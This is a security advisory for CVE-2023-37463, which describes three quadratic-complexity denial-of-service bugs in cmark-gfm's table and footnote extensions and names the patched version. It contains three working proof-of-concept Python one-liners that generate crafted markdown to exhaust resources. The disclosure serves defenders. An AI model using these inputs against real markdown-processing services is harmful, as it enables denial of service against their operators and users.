Skip to content

Quadratic complexity bugs may lead to a denial of service

Moderate
anticomputer published GHSA-w4qg-3vf7-m9x5 Jul 13, 2023

Package

cmark-gfm

Affected versions

0.29.0.gfm.11

Patched versions

0.29.0.gfm.12

Description

Impact

Three polynomial time complexity issues in cmark-gfm may lead to unbounded resource exhaustion and subsequent denial of service.

Proof of concept

Issue 1:

python3 -c 'n = 10000; print("|" + "x|" * n + "\n|" + "-|" * n)' | cmark-gfm -e table

Issue 2:

python3 -c 'n = 10000; print("|" + "x|" * n + "\n|" + "-|" * n + "\n" + "a\n" * n)' | cmark-gfm -e table

Issue 3:

python3 -c 'n = 10000; print("[^1]:" * n + "\n" * n)' | cmark-gfm -e footnotes

Increasing the number 10000 in the above commands causes the running time to increase quadratically.

Patches

These vulnerabilities have been patched in 0.29.0.gfm.12.

References

For more information

If you have any questions or comments about this advisory:

Severity

Moderate

CVE ID

CVE-2023-37463

Weaknesses

Inefficient Algorithmic Complexity

An algorithm in a product has an inefficient worst-case computational complexity that may be detrimental to system performance and can be triggered by an attacker, typically using crafted manipulations that ensure that the worst case is being reached. Learn more on MITRE.

Credits